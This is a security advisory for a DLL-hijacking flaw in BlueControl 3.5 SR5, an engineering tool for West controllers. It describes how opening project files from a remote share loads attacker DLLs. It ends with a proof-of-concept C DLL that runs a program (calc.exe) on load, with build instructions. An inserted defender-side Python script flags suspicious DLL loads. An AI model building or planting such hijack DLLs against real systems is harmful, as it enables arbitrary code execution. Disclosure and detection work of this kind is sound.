BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution

2016-01-19T00:00:00
ID ZSL-2016-5296
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-01-19T00:00:00

Description

Title: BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution
Advisory ID: ZSL-2016-5296
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 19.01.2016

Summary

Engineering Tool for West Pro Series of controllers (KS20-1, KS92-1, TB40-1, KS800, KS816, Dig280-1, KS vario, CI45, KS45, SG45, TB45, RL400, Pro96, CAL4600).

Description

BlueControl suffers from a DLL Hijacking issue. The vulnerability is caused by the application loading libraries (sortserver2003compat.dll, sxs.dll, cryptsp.dll, rpcrtremote.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening a related application file (.BCD, .BCL, .BCT, .EDW, .E80) located on a remote WebDAV or SMB share.
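As an added defender-side example (not part of the advisory and not Zero Science Lab's code), the following Python flags image-load telemetry in which BlueControl.exe loads one of the four DLLs named above from outside the Windows system directories, rating UNC paths as the high-severity case because they match the WebDAV/SMB share vector described. The record format, the trusted directories and the sample events are assumptions constructed for the example; the process path is taken from the PoC header.

```python
import ntpath

# DLLs the advisory names as resolved through BlueControl's insecure search path.
WATCHED_DLLS = {"sortserver2003compat.dll", "sxs.dll", "cryptsp.dll", "rpcrtremote.dll"}
# Legitimate homes for those DLLs; SysWOW64 because BlueControl.exe is 32-bit.
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
TARGET_PROCESS = "bluecontrol.exe"

# Constructed sample records (Event Viewer style text of Sysmon Event ID 7); not real telemetry.
SAMPLE_EVENTS = r"""
Image: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
ImageLoaded: C:\Windows\SysWOW64\cryptsp.dll

Image: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
ImageLoaded: \\192.0.2.10\projects\rpcrtremote.dll

Image: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
ImageLoaded: C:\Users\op\Downloads\sxs.dll
"""

def parse_records(text):
    """Split blank-line-separated 'Key: value' records into one dict each."""
    records = []
    for block in text.strip().split("\n\n"):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                fields[key.strip()] = value.strip()
        records.append(fields)
    return records


def classify_load(rec):
    """None, or (severity, reason) when BlueControl loads a watched DLL from a non-system path."""
    image, loaded = rec.get("Image", ""), rec.get("ImageLoaded", "")
    if ntpath.basename(image).lower() != TARGET_PROCESS:
        return None
    name = ntpath.basename(loaded).lower()
    if name not in WATCHED_DLLS:
        return None
    if ntpath.dirname(loaded).lower().rstrip("\\") in TRUSTED_DIRS:
        return None
    if loaded.startswith("\\\\"):  # UNC path: the WebDAV/SMB share vector from the advisory
        return ("high", f"{name} loaded from remote share {loaded}")
    return ("medium", f"{name} loaded from non-system path {loaded}")


def scan(text):
    return [hit for hit in map(classify_load, parse_records(text)) if hit]
```

Running `scan(SAMPLE_EVENTS)` on the constructed records flags the share load as high and the Downloads load as medium, and ignores the SysWOW64 load.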

Vendor

West Control Solutions - <http://www.west-cs.com>

Affected Version

3.5.SR5

Tested On

Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)

Vendor Status

N/A

PoC

bluecontrol_dllhijack.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://exchange.xforce.ibmcloud.com/vulnerabilities/109710>
[2] <https://cxsecurity.com/issue/WLB-2016010116>
[3] <https://packetstormsecurity.com/files/135316>
[4] <https://secunia.com/advisories/68412/>

Changelog

[19.01.2016] - Initial release
[21.01.2016] - Added references [1], [2] and [3]
[05.02.2016] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

/*


BlueControl 3.5 SR5 Insecure Library Loading Arbitrary Code Execution


Vendor: West Control Solutions
        PMA Prozeß- und Maschinen-Automation GmbH
Product web page: http://www.west-cs.com
Software link: http://www.west-cs.com/resources/software-temp-control/pma-products-software/
Application Path: C:\Program Files (x86)\PMA Tools\BlueControl\BlueControl.exe
Affected version: 3.5.SR5

Summary: Engineering Tool for West Pro Series of controllers (KS20-1, KS92-1,
TB40-1, KS800, KS816, Dig280-1, KS vario, CI45, KS45, SG45, TB45, RL400, Pro96,
CAL4600).

Desc: BlueControl suffers from a DLL Hijacking issue. The vulnerability is
caused by the application loading libraries (sortserver2003compat.dll,
sxs.dll, cryptsp.dll, rpcrtremote.dll) in an insecure manner. This can be
exploited to load arbitrary libraries by tricking a user into opening a
related application file (.BCD, .BCL, .BCT, .EDW, .E80) located on a remote
WebDAV or SMB share.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5296
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5296.php


10.12.2015

*/


// gcc -shared -o rpcrtremote.dll exploit.c
// (a Windows-targeting gcc such as MinGW; the output name must be one of the
//  libraries listed above that BlueControl resolves through its search path)

#include <windows.h>

int exec(void);   /* forward declaration so DllMain can call it */

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
	(void)hinstDLL;
	(void)lpvReserved;
	/* Run the payload once, when the process maps the library. */
	if (dwReason == DLL_PROCESS_ATTACH)
		exec();
	return TRUE;
}

int exec(void)
{
	/* Proof-of-concept payload: launch the calculator. */
	WinExec("calc.exe", SW_NORMAL);
	return 0;
}